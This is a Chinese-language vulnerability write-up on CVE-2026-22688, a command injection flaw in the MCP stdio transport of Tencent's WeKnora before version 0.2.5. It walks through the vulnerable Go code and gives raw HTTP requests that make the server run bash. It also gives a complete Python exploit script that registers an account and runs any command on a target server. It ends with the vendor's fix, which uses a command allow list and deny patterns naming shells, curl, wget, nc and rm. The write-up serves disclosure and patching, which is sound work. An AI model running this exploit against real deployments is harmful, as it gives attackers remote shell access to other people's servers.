CVE-2026-22688–腾讯WeKnoraMCPStdio命令注入漏洞

admin 2026-01-17 01:54:39 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 本文分析了腾讯WeKnora框架CVE-2026-22688命令注入漏洞。在0.2.5版本前,系统未对MCP服务stdio传输的command和args参数做校验,直接调用exec.Command,导致攻击者可获取服务器Shell权限。文章详述了漏洞代码逻辑与复现流程。官方已在0.2.5版本通过命令白名单和参数黑名单机制修复该问题,建议用户尽快升级以防范RCE风险。 综合评分: 91 文章分类: 漏洞分析,代码审计,漏洞POC


cover_image

CVE-2026-22688 – 腾讯WeKnora MCP Stdio 命令注入漏洞

dmd5安全 dmd5安全

dmd5安全

2026年1月15日 16:38 江西

一、漏洞描述

WeKnora 是一个基于大型语言模型(LLM)的框架,专为深度文档理解和语义检索而设计,尤其适用于处理复杂、异构文档。

#

它采用模块化架构,结合了多模态预处理、语义向量索引、智能检索和大型语言模型推理。WeKnora 的核心遵循 RAG(检索增强生成) 范式,通过将相关文档块与模型推理相结合,实现高质量、上下文感知性的答案。

#

WeKnora 在 0.2.5 版本之前,当用户创建或更新 MCP 服务时,如果传输类型选择 stdio,系统直接将用户提交的 command 和 args 参数传递给 exec.Command() 执行,未进行任何安全验证。

攻击者可以通过指定任意命令(如 bash、sh)及其参数,在服务器端执行恶意系统命令。由于服务通常以容器化方式部署,攻击者可获得容器内的 shell 访问权限,进一步可能逃逸到宿主机。 二、环境搭建 * 软件版本: WeKnora 0.2.3 (漏洞版本) * 部署方式: Docker Compose * 测试环境: macOS / Linux * Go 版本: 1.24 部署步骤 # 1. 下载漏洞版本源码cd /Users/liaojialin.6/Downloads/WeKnora-0.2.3 # 2.******* 这里我需要使用代理,不然我这里一直会报错,使用代理就好了docker compose build --build-arg GOPROXY_ARG=https://goproxy.cn,direct --build-arg APK_MIRROR_ARG= app # 3. 然后启动所有的服务docker compose up -d postgres redis docreader app 验证

三、漏洞分析/代码分析

漏洞触发链路

先看链路,先懂整体流程后,然后再去分析代码,就会方便很多了

用户请求 (POST /api/v1/mcp-services)    ↓CreateMCPService Handler (mcp_service.go:28)    ↓验证 TenantID,绑定 JSON 到 MCPService 结构体    ↓调用 mcpServiceService.CreateMCPService() 存入数据库    ↓用户请求测试连接 (POST /api/v1/mcp-services/{id}/test)    ↓TestMCPService Handler (mcp_service.go:258)    ↓调用 mcpServiceService.TestMCPService()    ↓调用 mcp.NewMCPClient() 创建客户端    ↓【漏洞点】client.NewStdioMCPClientWithOptions() 直接执行用户命令

代码分析

直接定位到和 MCP 相关的代码部分,一个是客户端代码,一个服务端代码

客户端代码

其实核心就是参数传递的过程中,解析问题,如果没有对我们传入的参数做任何过滤,在客户端调用的过程中直接执行

NewMCPClient 函数:

// NewMCPClient creates a new MCP client based on the transport typefunc NewMCPClient(config *ClientConfig) (MCPClient, error) {    // ... 省略 HTTP client 和 headers 构建代码 ...
    // Create client based on transport type    var mcpClient *client.Client    var err error    switch config.Service.TransportType {    case types.MCPTransportSSE:        // SSE 传输类型处理...        mcpClient, err = client.NewSSEMCPClient(*config.Service.URL,            client.WithHTTPClient(httpClient),            client.WithHeaders(headers),        )        if err != nil {            return nil, fmt.Errorf("failed to create SSE client: %w", err)        }    case types.MCPTransportHTTPStreamable:        // HTTP Streamable 传输类型处理...        mcpClient, err = client.NewStreamableHttpClient(*config.Service.URL,            transport.WithHTTPBasicClient(httpClient),            transport.WithHTTPHeaders(headers),        )        if err != nil {            return nil, fmt.Errorf("failed to create HTTP streamable client: %w", err)        }    case types.MCPTransportStdio:        if config.Service.StdioConfig == nil {            return nil, fmt.Errorf("stdio_config is required for stdio transport")        }
        // Convert env vars map to []string format (KEY=value)        envVars := make([]string, 0, len(config.Service.EnvVars))        for key, value := range config.Service.EnvVars {            envVars = append(envVars, fmt.Sprintf("%s=%s", key, value))        }
        // Create stdio client with options        // NewStdioMCPClientWithOptions(command string, env []string, args []string, opts ...transport.StdioOption)        // 🔴 漏洞点:直接使用用户输入的 command 和 args,无任何验证!        mcpClient, err = client.NewStdioMCPClientWithOptions(            config.Service.StdioConfig.Command,  // ← 完全由用户控制            envVars,            config.Service.StdioConfig.Args,     // ← 完全由用户控制        )        if err != nil {            return nil, fmt.Errorf("failed to create stdio client: %w", err)        }    default:        return nil, ErrUnsupportedTransport    }
    return &mcpGoClient{        service: config.Service,        client:  mcpClient,    }, nil}

创建 MCP 服务的 API 入口

文件位置: internal/handler/mcp_service.go

完整的 CreateMCPService 函数:

核心问题都在注释中标注出来了,创建 MCP 服务端,服务端解析的时候,也没有任何验证

// POST /api/mcp-servicesfunc (h *MCPServiceHandler) CreateMCPService(c *gin.Context) {    ctx := c.Request.Context()
    var service types.MCPService    // 🔴 直接将 JSON 请求体绑定到结构体,无任何验证    if err := c.ShouldBindJSON(&service); err != nil {        logger.Error(ctx, "Failed to parse MCP service request", err)        c.Error(errors.NewBadRequestError(err.Error()))        return    }
    tenantID := c.GetUint64(types.TenantIDContextKey.String())    if tenantID == 0 {        logger.Error(ctx, "Tenant ID is empty")        c.Error(errors.NewBadRequestError("Tenant ID cannot be empty"))        return    }    service.TenantID = tenantID
    // 🔴 直接调用服务层创建,未对 stdio_config.command/args 进行安全检查    if err := h.mcpServiceService.CreateMCPService(ctx, &service); err != nil {        logger.ErrorWithFields(ctx, err, map[string]interface{}{"service_name": secutils.SanitizeForLog(service.Name)})        c.Error(errors.NewInternalServerError("Failed to create MCP service: " + err.Error()))        return    }
    c.JSON(http.StatusOK, gin.H{        "success": true,        "data":    service,    })}

服务层测试逻辑

文件位置: internal/application/service/mcp_service.go

TestMCPService 函数:

// TestMCPService tests the connection to an MCP service and returns available tools/resourcesfunc (s *mcpServiceService) TestMCPService(    ctx context.Context,    tenantID uint64,    id string,) (*types.MCPTestResult, error) {    // Get service    service, err := s.mcpServiceRepo.GetByID(ctx, tenantID, id)    if err != nil {        return nil, fmt.Errorf("failed to get MCP service: %w", err)    }    if service == nil {        return nil, fmt.Errorf("MCP service not found")    }
    // Create temporary client for testing    config := &mcp.ClientConfig{        Service: service,  //  我们自己输入的恶意 command/args    }
    // 🔴 调用 mcp.NewMCPClient(),这里会执行用户命令    client, err := mcp.NewMCPClient(config)    if err != nil {        return &types.MCPTestResult{            Success: false,            Message: fmt.Sprintf("Failed to create client: %v", err),        }, nil    }
    // Connect    testCtx, cancel := context.WithTimeout(ctx, 30*time.Second)    defer cancel()
    // 🔴 client.Connect() 内部调用 Start(),真正执行命令的地方    if err := client.Connect(testCtx); err != nil {        return &types.MCPTestResult{            Success: false,            Message: fmt.Sprintf("Connection failed: %v", err),        }, nil    }    defer client.Disconnect()}

命令执行的核心代码

文件位置: internal/mcp/client.go

NewMCPClient 函数中的 stdio 处理部分:

case types.MCPTransportStdio:    if config.Service.StdioConfig == nil {        return nil, fmt.Errorf("stdio_config is required for stdio transport")    }
    // Convert env vars map to []string format (KEY=value)    envVars := make([]string, 0, len(config.Service.EnvVars))    for key, value := range config.Service.EnvVars {        envVars = append(envVars, fmt.Sprintf("%s=%s", key, value))    }
    // Create stdio client with options    // NewStdioMCPClientWithOptions(command string, env []string, args []string, opts ...transport.StdioOption)    // 🔴 漏洞点:直接使用用户输入的 command 和 args,无任何验证!    mcpClient, err = client.NewStdioMCPClientWithOptions(        config.Service.StdioConfig.Command,  // ← 完全由用户控制        envVars,        config.Service.StdioConfig.Args,     // ← 完全由用户控制    )    if err != nil {        return nil, fmt.Errorf("failed to create stdio client: %w", err)    }

Connect 函数:

// Connect establishes connection to the MCP servicefunc (c *mcpGoClient) Connect(ctx context.Context) error {    if c.connected {        return ErrAlreadyConnected    }
    // 🔴 Start the client - 这里真正执行用户命令!    if err := c.client.Start(ctx); err != nil {        return fmt.Errorf("failed to start client: %w", err)    }
    c.connected = true    if c.service.TransportType == types.MCPTransportStdio {        logger.GetLogger(ctx).Infof("MCP stdio client connected: %s %v",            c.service.StdioConfig.Command, c.service.StdioConfig.Args)    } else {        logger.GetLogger(ctx).Infof("MCP client connected to %s", *c.service.URL)    }    return nil}

四、漏洞复现

步骤 1: 注册用户账号

POST /api/v1/auth/register HTTP/1.1Host: localhost:8080Content-Type: application/json
{  "username": "attacker",  "email": "[email protected]",  "password": "Attacker123"}

然后我们去登录

步骤 2: 登录获取 Token

POST /api/v1/auth/login HTTP/1.1Host: localhost:8080Content-Type: application/json
{  "email": "[email protected]",  "password": "Attacker123"}

有了用户我们就可以创建 MCP 服务器了

步骤 3: 创建恶意 MCP 服务

POST /api/v1/mcp-services HTTP/1.1Host: localhost:8080Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJlbWFpbCI6ImF0dGFja2VyQHRlc3QuY29tIiwiZXhwIjoxNzY4MTIzMjM3LCJpYXQiOjE3NjgwMzY4MzcsInRlbmFudF9pZCI6MTAwMDMsInR5cGUiOiJhY2Nlc3MiLCJ1c2VyX2lkIjoiMTJlNjg3YzMtNTkzNS00MTY1LTk4NjItODhhOTY4ZDM3YzhlIn0.5IgEJQAxgf5xketuZBs1F-r7PkFUfWZiTJeMJSTpmXMContent-Type: application/jsonContent-Length: 252
{    "name": "rce",    "description": "rce",    "enabled": true,    "transport_type": "stdio",    "stdio_config": {      "command": "bash",      "args": ["-lc", "id > /tmp/RCE_ok.txt && uname -a >> /tmp/RCE_ok.txt"]    },    "env_vars": {}  }

步骤 4: 触发命令执行

POST /api/v1/mcp-services/f41aa229-b1c7-4f8e-ab25-204751f6693f/test HTTP/1.1Host: localhost:8080Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJlbWFpbCI6ImF0dGFja2VyQHRlc3QuY29tIiwiZXhwIjoxNzY4MTIzMjM3LCJpYXQiOjE3NjgwMzY4MzcsInRlbmFudF9pZCI6MTAwMDMsInR5cGUiOiJhY2Nlc3MiLCJ1c2VyX2lkIjoiMTJlNjg3YzMtNTkzNS00MTY1LTk4NjItODhhOTY4ZDM3YzhlIn0.5IgEJQAxgf5xketuZBs1F-r7PkFUfWZiTJeMJSTpmXMContent-Type: application/jsonContent-Length: 252

这部响应会超时,是正常的

步骤 5: 验证命令执行结果

一键利用脚本

文件: exploit_weknora_rce.py

#!/usr/bin/env python3"""CVE-2026-22688 - WeKnora MCP Stdio Command Injection Exploit
漏洞影响: WeKnora < 0.2.5利用条件: 需要已认证用户账号"""
import&nbsp;requestsimport&nbsp;sysimport&nbsp;json
class&nbsp;WeKnoraExploit:&nbsp; &nbsp;&nbsp;def&nbsp;__init__(self, target_url):&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;self.target_url = target_url.rstrip('/')&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;self.session = requests.Session()&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;self.token =&nbsp;None
&nbsp; &nbsp;&nbsp;def&nbsp;register(self, username, email, password):&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"""注册用户"""&nbsp; &nbsp; &nbsp; &nbsp; url =&nbsp;f"{self.target_url}/api/v1/auth/register"&nbsp; &nbsp; &nbsp; &nbsp; data = {&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"username": username,&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"email": email,&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"password": password&nbsp; &nbsp; &nbsp; &nbsp; }&nbsp; &nbsp; &nbsp; &nbsp; resp =&nbsp;self.session.post(url, json=data)&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;resp.status_code ==&nbsp;201:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;print(f"[+] 注册成功:&nbsp;{email}")&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;True&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;print(f"[-] 注册失败:&nbsp;{resp.text}")&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;False
&nbsp; &nbsp;&nbsp;def&nbsp;login(self, email, password):&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"""登录获取 Token"""&nbsp; &nbsp; &nbsp; &nbsp; url =&nbsp;f"{self.target_url}/api/v1/auth/login"&nbsp; &nbsp; &nbsp; &nbsp; data = {"email": email,&nbsp;"password": password}&nbsp; &nbsp; &nbsp; &nbsp; resp =&nbsp;self.session.post(url, json=data)&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;resp.status_code ==&nbsp;200:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; result = resp.json()&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;self.token = result.get('token')&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;print(f"[+] 登录成功,获取 Token")&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;True&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;print(f"[-] 登录失败:&nbsp;{resp.text}")&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;False
&nbsp; &nbsp;&nbsp;def&nbsp;create_mcp_service(self, command, args):&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"""创建恶意 MCP 服务"""&nbsp; &nbsp; &nbsp; &nbsp; url =&nbsp;f"{self.target_url}/api/v1/mcp-services"&nbsp; &nbsp; &nbsp; &nbsp; headers = {"Authorization":&nbsp;f"Bearer&nbsp;{self.token}"}&nbsp; &nbsp; &nbsp; &nbsp; data = {&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"name":&nbsp;"exploit",&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"description":&nbsp;"exploit",&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"enabled":&nbsp;True,&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"transport_type":&nbsp;"stdio",&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"stdio_config": {&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"command": command,&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"args": args&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; },&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"env_vars": {}&nbsp; &nbsp; &nbsp; &nbsp; }&nbsp; &nbsp; &nbsp; &nbsp; resp =&nbsp;self.session.post(url, json=data, headers=headers)&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;resp.status_code ==&nbsp;200:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; result = resp.json()&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; service_id = result['data']['id']&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;print(f"[+] 恶意 MCP 服务创建成功,ID:&nbsp;{service_id}")&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;service_id&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;print(f"[-] 创建 MCP 服务失败:&nbsp;{resp.text}")&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;None
&nbsp; &nbsp;&nbsp;def&nbsp;trigger_execution(self, service_id):&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"""触发命令执行"""&nbsp; &nbsp; &nbsp; &nbsp; url =&nbsp;f"{self.target_url}/api/v1/mcp-services/{service_id}/test"&nbsp; &nbsp; &nbsp; &nbsp; headers = {"Authorization":&nbsp;f"Bearer&nbsp;{self.token}"}&nbsp; &nbsp; &nbsp; &nbsp; resp =&nbsp;self.session.post(url, headers=headers)&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;print(f"[+] 触发命令执行:&nbsp;{resp.text}")&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;resp.status_code ==&nbsp;200
&nbsp; &nbsp;&nbsp;def&nbsp;execute_command(self, command, args):&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"""执行任意命令"""&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;not&nbsp;self.token:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;print("[-] 请先登录")&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;False
&nbsp; &nbsp; &nbsp; &nbsp; service_id =&nbsp;self.create_mcp_service(command, args)&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;service_id:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;self.trigger_execution(service_id)&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;False

def&nbsp;main():&nbsp; &nbsp;&nbsp;if&nbsp;len(sys.argv) <&nbsp;2:&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;print(f"用法:&nbsp;{sys.argv[0]}&nbsp;<target_url> [command] [args...]")&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;print(f"示例:&nbsp;{sys.argv[0]}&nbsp;http://localhost:8080 'bash' '-c' 'id > /tmp/pwned.txt'")&nbsp; &nbsp; &nbsp; &nbsp; sys.exit(1)
&nbsp; &nbsp; target_url = sys.argv[1]&nbsp; &nbsp; exploit = WeKnoraExploit(target_url)
&nbsp; &nbsp;&nbsp;# 注册或登录&nbsp; &nbsp; email =&nbsp;"[email protected]"&nbsp; &nbsp; password =&nbsp;"Attacker123"&nbsp; &nbsp; exploit.register("attacker", email, password)&nbsp; &nbsp; exploit.login(email, password)
&nbsp; &nbsp;&nbsp;# 执行命令&nbsp; &nbsp;&nbsp;if&nbsp;len(sys.argv) >=&nbsp;4:&nbsp; &nbsp; &nbsp; &nbsp; command = sys.argv[2]&nbsp; &nbsp; &nbsp; &nbsp; args = sys.argv[3:]&nbsp; &nbsp;&nbsp;else:&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;# 默认命令&nbsp; &nbsp; &nbsp; &nbsp; command =&nbsp;"bash"&nbsp; &nbsp; &nbsp; &nbsp; args = ["-lc",&nbsp;"id > /tmp/RCE_ok.txt && uname -a >> /tmp/RCE_ok.txt"]
&nbsp; &nbsp;&nbsp;print(f"[*] 执行命令:&nbsp;{command}&nbsp;{' '.join(args)}")&nbsp; &nbsp; exploit.execute_command(command, args)&nbsp; &nbsp;&nbsp;print("[+] 利用完成,请验证命令执行结果")

if&nbsp;__name__ ==&nbsp;"__main__":&nbsp; &nbsp; main()

五、漏洞修复

修复版本: WeKnora >= 0.2.5

官方在 commit f7900a5e9a18c99d25cec9589ead9e4e59ce04bb 中添加了完整的输入验证机制。

internal/utils/security.go

// AllowedStdioCommands defines the whitelist of allowed commands for MCP stdio transport// These are the standard MCP server launchers that are considered safevar&nbsp;AllowedStdioCommands =&nbsp;map[string]bool{&nbsp; &nbsp;&nbsp;"uvx":&nbsp;true,&nbsp;// Python package runner (uv)&nbsp; &nbsp;&nbsp;"npx":&nbsp;true,&nbsp;// Node.js package runner}
// DangerousArgPatterns contains patterns that indicate potentially dangerous argumentsvar&nbsp;DangerousArgPatterns = []*regexp.Regexp{&nbsp; &nbsp; regexp.MustCompile(`(?i)^-c$`), &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// Shell command execution flag&nbsp; &nbsp; regexp.MustCompile(`(?i)^--command$`), &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;// Shell command execution flag&nbsp; &nbsp; regexp.MustCompile(`(?i)^-e$`), &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// Eval flag&nbsp; &nbsp; regexp.MustCompile(`(?i)^--eval$`), &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// Eval flag&nbsp; &nbsp; regexp.MustCompile(`(?i)[;&|]`), &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;// Shell command chaining&nbsp; &nbsp; regexp.MustCompile(`(?i)\$\(`), &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// Command substitution&nbsp; &nbsp; regexp.MustCompile("(?i)`"), &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;// Backtick command substitution&nbsp; &nbsp; regexp.MustCompile(`(?i)>\s*[/~]`), &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// Output redirection to absolute/home path&nbsp; &nbsp; regexp.MustCompile(`(?i)<\s*[/~]`), &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// Input redirection from absolute/home path&nbsp; &nbsp; regexp.MustCompile(`(?i)^/bin/`), &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// Direct binary path&nbsp; &nbsp; regexp.MustCompile(`(?i)^/usr/bin/`), &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// Direct binary path&nbsp; &nbsp; regexp.MustCompile(`(?i)^/sbin/`), &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;// Direct binary path&nbsp; &nbsp; regexp.MustCompile(`(?i)^/usr/sbin/`), &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;// Direct binary path&nbsp; &nbsp; regexp.MustCompile(`(?i)^\.\./`), &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// Path traversal&nbsp; &nbsp; regexp.MustCompile(`(?i)/\.\./`), &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// Path traversal in middle&nbsp; &nbsp; regexp.MustCompile(`(?i)^(bash|sh|zsh|ksh|csh|tcsh|fish|dash)$`),&nbsp;// Shell interpreters as args&nbsp; &nbsp; regexp.MustCompile(`(?i)^(curl|wget|nc|netcat|ncat)$`), &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// Network tools as args&nbsp; &nbsp; regexp.MustCompile(`(?i)^(rm|dd|mkfs|fdisk)$`), &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// Destructive commands as args}
// DangerousEnvVarPatterns contains patterns for dangerous environment variable names or valuesvar&nbsp;DangerousEnvVarPatterns = []*regexp.Regexp{&nbsp; &nbsp; regexp.MustCompile(`(?i)^LD_PRELOAD$`), &nbsp; &nbsp; &nbsp;// Library injection&nbsp; &nbsp; regexp.MustCompile(`(?i)^LD_LIBRARY_PATH$`),&nbsp;// Library path manipulation&nbsp; &nbsp; regexp.MustCompile(`(?i)^DYLD_`), &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;// macOS dynamic linker&nbsp; &nbsp; regexp.MustCompile(`(?i)^PATH$`), &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;// PATH manipulation&nbsp; &nbsp; regexp.MustCompile(`(?i)^PYTHONPATH$`), &nbsp; &nbsp; &nbsp;// Python path manipulation&nbsp; &nbsp; regexp.MustCompile(`(?i)^NODE_OPTIONS$`), &nbsp; &nbsp;// Node.js options injection&nbsp; &nbsp; regexp.MustCompile(`(?i)^BASH_ENV$`), &nbsp; &nbsp; &nbsp; &nbsp;// Bash environment file&nbsp; &nbsp; regexp.MustCompile(`(?i)^ENV$`), &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// Shell environment file&nbsp; &nbsp; regexp.MustCompile(`(?i)^SHELL$`), &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// Shell override}
// ValidateStdioCommand validates the command for MCP stdio transport// Returns an error if the command is not in the whitelist or contains dangerous patternsfunc&nbsp;ValidateStdioCommand(command&nbsp;string)&nbsp;error&nbsp;{&nbsp; &nbsp;&nbsp;if&nbsp;command ==&nbsp;""&nbsp;{&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;fmt.Errorf("command cannot be empty")&nbsp; &nbsp; }
&nbsp; &nbsp;&nbsp;// Normalize command (extract base name if it's a path)&nbsp; &nbsp; baseCommand := command&nbsp; &nbsp;&nbsp;if&nbsp;strings.Contains(command,&nbsp;"/") {&nbsp; &nbsp; &nbsp; &nbsp; parts := strings.Split(command,&nbsp;"/")&nbsp; &nbsp; &nbsp; &nbsp; baseCommand = parts[len(parts)-1]&nbsp; &nbsp; }
&nbsp; &nbsp;&nbsp;// Check against whitelist&nbsp; &nbsp;&nbsp;if&nbsp;!AllowedStdioCommands[baseCommand] {&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;fmt.Errorf("command '%s' is not in the allowed list. Allowed commands: uvx, npx, node, python, python3, deno, bun", baseCommand)&nbsp; &nbsp; }
&nbsp; &nbsp;&nbsp;// Additional check: command should not contain path traversal&nbsp; &nbsp;&nbsp;if&nbsp;strings.Contains(command,&nbsp;"..") {&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;fmt.Errorf("command path contains invalid characters")&nbsp; &nbsp; }
&nbsp; &nbsp;&nbsp;return&nbsp;nil}
// ValidateStdioArgs validates the arguments for MCP stdio transport// Returns an error if any argument contains dangerous patternsfunc&nbsp;ValidateStdioArgs(args []string)&nbsp;error&nbsp;{&nbsp; &nbsp;&nbsp;if&nbsp;len(args) ==&nbsp;0&nbsp;{&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;nil&nbsp; &nbsp; }
&nbsp; &nbsp;&nbsp;for&nbsp;i, arg :=&nbsp;range&nbsp;args {&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// Check length&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;len(arg) >&nbsp;1024&nbsp;{&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;fmt.Errorf("argument %d exceeds maximum length (1024 characters)", i)&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// Check against dangerous patterns&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;for&nbsp;_, pattern :=&nbsp;range&nbsp;DangerousArgPatterns {&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;pattern.MatchString(arg) {&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;fmt.Errorf("argument %d contains potentially dangerous pattern: %s", i, SanitizeForLog(arg))&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// Check for null bytes&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;strings.Contains(arg,&nbsp;"\x00") {&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;fmt.Errorf("argument %d contains null bytes", i)&nbsp; &nbsp; &nbsp; &nbsp; }&nbsp; &nbsp; }
&nbsp; &nbsp;&nbsp;return&nbsp;nil}
// ValidateStdioEnvVars validates environment variables for MCP stdio transport// Returns an error if any env var name or value is dangerousfunc&nbsp;ValidateStdioEnvVars(envVars&nbsp;map[string]string)&nbsp;error&nbsp;{&nbsp; &nbsp;&nbsp;if&nbsp;len(envVars) ==&nbsp;0&nbsp;{&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;nil&nbsp; &nbsp; }
